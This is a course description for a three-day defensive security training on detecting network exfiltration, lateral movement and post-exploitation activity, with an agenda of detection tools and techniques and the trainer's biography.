Detection of In & Out – Network Exfiltration and Post-Exploitation Techniques – BLUE EDITION

Course Description


Detection of In & Out – Network Exfiltration and Post-Exploitation Techniques – BLUE EDITION” is an advanced lab-based training created to present participants:

  • Significance of security events correlation including context to reduce the number of false positives and better detection of adversary activities
  • Advanced detection methods and techniques against exfiltration and lateral movement including event mapping, grouping and tagging
  • Understand tactics and behaviours of the adversary after gaining initial access to the network (Linux/Windows)
  • Detection methods of tunnelling, hiding, pivoting and custom, simulated malicious network events
  • Capabilities of many popular Open Source tools and integration with 3rd party security (IDS/IPS/WAF/EDR) and analytics solutions against adversaries actions
  • Verification methods and techniques for product and service providers from IT Security space → in terms of internal testing and PoC / PoV programs

The main goal of the workshop is to achieve better detection of post-exploitation activities and more effective incident handling, thus allowing to reduce the number of false positives in the SOC environment. Individual detection lab cases will be launched and analyzed together in details by finding new and using existing DFIR artifacts. A modular lab-oriented form of the training allows for a later use and combination within your own SOC infrastructure, expanding and delivering complex tactics, techniques and procedures (TTP).

Individual artifacts of “RED” actions will be linked, properly characterized, tagged and grouped taking into account the level of criticality, mapping to the MITRE ATT&CK Framework and chain-linking events/pieces of evidence that make up a given security incident.

The workshop is filled with substantive examples / contextual insertions from the community world of Threat hunting, Blue / Red, including the source of origin.

An integral element of the workshop is a DFIR quiz consisting of presenting real cases of suspicious activities in the form of describing artifacts offline.

The entire training is based on a purely practical laboratory in which the student independently performs each action or related scenarios in a dedicated virtual laboratory network. This class focuses on x86 / x64 architecture, IPv4 / IPv6 networks and targets distributed Linux and Windows environments (AD 2016, 10, 7).

In terms of IDS / IPS / Data Leakage Protection and for a better understanding of the current status of your network security position, training experience will help you understand the risks, identify dead points of your network security and undiscovered infrastructure spaces by simulating and detecting the actions of a real cyber-threat actor.

The proposed training BLUE agenda – in the defensive edition –  is a natural continuation of the first → offensive (RED) edition of the training. Highly technical content and only a practical approach guarantees that the use of the transferred knowledge and technologies in real production environments will be easy, smooth and repeatable.

Make sure your network’s security really works!

Course contents

Day 1:

  • Introduction → PCAP Exfiltration CTF-style challenge.
  • One more time → MITRE Attack Framework → detection map based on 5 examples of chained attack scenarios.
  • Finding malicious artifacts using yara and ssdeep:
    • How yara works and why it could be your best friend
    • Yarascan + Volatility Framework vs Linux rootkits
    • Yara vs webshells
  • Collecting, analyzing and correlating data from different data sources using:
    • Wazuh
    • Graylog
    • Open vSwitch
    • Auditd / go-audit
    • eBPF
    • OSquery
    • Splunk / Elastic Stack / HELK
  • The power of MISP – Threat Intelligence Platform.
  • Windows Sysinternals Suite:
    • Sysmon:
      • Process execution events
      • Network connection events
      • Image load events
      • Named pipe events
      • WMI events
      • PSexec events
    • Process Explorer
    • Process Monitor
    • Autoruns
    • Evidence traces of file download and execution:
      • cmd.exe
      • HTA
      • JS
      • VBS
      • WSF
      • JSE
      • CSharp
      • certutil
      • Powershell
      • Bitsadmin
      • Shellcode injection techniques
      • WebDAV / SMB / NFS share mapping

Day 2:

  • Low-level Linux security tracing and profiling for critical services:
    • eBPF
    • sysdig
  • Detection of unusual log patterns and 0-day exploitation attempts using source code analysis of your critical network service.
  • Playing with BRO IDS / Suricata IDS for anomaly detection → finding malicious artifacts at the network level:
    • The importance of network baseline for high-risk environments
    • Virtual SPAN / TAP and Netflow → OpenVswitch
    • Feature definition and extraction
    • Bro-cut syntax
    • Bro Script Index
    • Client/server Fingerprinting:
      • JA3
      • HASSH
    • Security feature extraction per many different network protocols
  • Detection and traces of network exfiltration techniques → use cases:
    • ICMP
    • TCP / UDP
    • SSL / TLS
    • DNS / DoH / DGA / anomalies
    • HTTP / HTTP2 / QUIC
    • LDAP Exfil
    • Dropbox / Twitter / Gmail / Mozilla
    • SMB bind named pipes
    • Legitimate website covert channel
    • Intelligent HTTP C2 Redirection
    • Port knocking
    • Domain fronting
    • ngrok
    • SSH Tunneling and pivoting
    • RDP Tunneling and pivoting / RDP Inception
    • Egress testing and common network traffic on non-standard ports

Day 3:

  • Detection and traces of post-exploitation, lateral movements → use cases:
    • AD Reconnaissance / AD Snapshot
    • Bloodhound artifacts
    • Golden Ticket
    • Silver Ticket
    • Kerberoasting
    • RPC over TCP/IP
    • DCsync / DCShadow
    • Mimicatz agent/server
    • Pass The Hash
    • SMBexec
    • Invoke-WMI
    • Invoke-PSexec
    • PSRemoting
    • RDP wrapping
    • Offensive Powershell:
      • WMI multiple sessions
      • Remote network relaying
      • Copy VSS
      • Keylogging
      • LSA secrets extraction
      • Sandbox / virtual environment detection
      • UAC bypassing
    • Poisoning LLMNR, NBT-NS, MDNS, WPAD and WSUS
    • SMB ransomware detection.
    • Browser pivoting.
  • Detection of brute-force attacks → use cases:
    • SQL
    • AD
    • SSH
    • Web Apps
  • Windows Malware Persistence Methods:
    • Service
    • Winlogon registry entries
    • Run / RunOnce
    • Scheduled Tasks
    • Startup Folder
    • WMI
    • DLL
  • Linux Malware Persistence Methods:
    • Service
    • Startup scripts
    • SSH magic password
    • Port knocking / iptables
    • Kernel modules
  • Describing relevant log events as generic and open signature → Sigma rules:
    • Application
    • APT
    • Linux
    • Network
    • Proxy
    • Web
    • Windows


  • An intermediate level of command line syntax experience using Linux and Windows
  • Fundamental knowledge of TCP/IP network protocols
  • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
  • Basic programming skills are a plus, but not essential

System Requirements

  • At least 30GB of free disk space
  • At least 8GB of RAM
  • Students should have the latest Virtualbox installed on their machine
  • Full Admin access on your laptop

Who should attend:

  • Red and Blue team members
  • Security / Data Analytics
  • CIRT / Incident Response Specialists
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Chief Security Officers and IT Security Directors

If you are looking to:

  • Learn ways to improve your detection and event correlations skills across many different data sources
  • Find the malicious activities and identify threats details on the network
  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling
  • Profile your critical OS and network segments in terms of ‘normal vs exotic’ behaviour
  • Find out how DFIR / IR Open Source Software can support your SIEM infrastructure
  • Learn current trends, techniques, and tools for network exfiltration and lateral movements
  • Understand the value of DLP / IDS / IPS / FW / WAF / Memory Forensics against real adversary lab scenarios
  • Understand values from an automated approach to simulating attackers and generating anomalies
  • Identify blind spots in your network security posture

Then this training is for you!

Trainer Biography

Leszek Miś is the Founder of Defensive Security, Principal Trainer and Security Researcher with over 15 years of experience in Cyber Security and Open Source Security Solutions market. He went through the full path of the infosec carrier positions: from OSS researcher, Linux administrator and system developer, Solution Engineer, DevOps and CI, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European market, to become finally an IT Security Architect / SOC Security Analyst with deep non-vendor focus on Network Security attack and detection. He’s got deep knowledge about finding blind spots and security gaps in corporate environments. Perfectly understands technology and business values from delivering structured, automated adversary simulation platform.

Recognized speaker and trainer: BruCON, Black Hat USA, OWASP Appsec USA, FloCon USA, Hack In The Box DBX/AMS/Singapore, Nanosec Asia, Confidence PL, PLNOG, Open Source Day PL, Red Hat Roadshow. Member of OWASP Poland Chapter.

Author of many IT Security training:

  • Open Source Defensive Security → The Trinity of Tactics for Defenders
  • In & Out → Network Data Exfiltration Techniques [RED EDITION]
  • In & Out → Detection of Network Data Exfiltration Techniques [BLUE EDITION]
  • System Internals – Network, OS and Memory Forensics
  • SELinux → Development & Administration of Mandatory Access Control Policy
  • Advanced RHEL/CentOS Defensive Security & Hardening
  • ModSecurity → Development and Management of Web Application Firewall rules
  • FreeIPA → Identity Management for Linux Domain Environments & Trusts

Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.

His areas of interest include network “features” extraction, OS internals and forensics. Constantly tries to figure out what the AI/ML Network Security vendors try to sell. In free time he likes to break into “IoT world” just for fun.

Still learning hard every single day.